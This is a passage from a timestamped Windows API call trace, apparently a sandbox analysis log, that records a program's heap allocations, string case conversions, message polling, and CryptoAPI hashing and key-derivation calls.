(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0199.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0199.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0199.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.964] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0199.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1e8 [0199.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0199.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0199.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0199.965] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0199.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0199.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.966] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.966] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.966] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0199.966] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0199.966] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0199.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0199.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0199.966] CryptCreateHash (in: hProv=0xad63f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0199.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0199.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0199.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0199.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0199.967] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0199.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0199.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0199.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0199.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0199.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0199.968] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.968] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.968] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0199.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0199.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0199.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.968] CryptHashData (hHash=0xaa5860, pbData=0x24b1698, dwDataLen=0x3, dwFlags=0x1) returned 1 [0199.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0199.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0199.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0199.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0199.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0199.968] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.968] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.969] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0199.969] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0199.969] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0199.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0199.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0199.969] CryptDeriveKey (in: hProv=0xad63f8, Algid=0x6601, hBaseData=0xaa5860, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58a0) returned 1 [0199.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0199.969] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0199.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.970] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.970] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.970] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.971] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.972] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0199.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.972] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.973] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0199.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.973] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.973] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0199.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.974] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0199.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0199.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0199.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0199.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.975] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0199.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0199.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0199.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0199.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466d90, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0199.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0199.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0199.976] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0199.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0199.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0199.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0199.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0199.977] CryptDestroyHash (hHash=0xaa5860) returned 1 [0199.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0199.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0199.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0199.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0199.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0199.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0199.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0199.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0199.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0199.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0199.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0199.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0199.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0199.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0199.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0199.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0199.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0199.979] HeapFree (in: 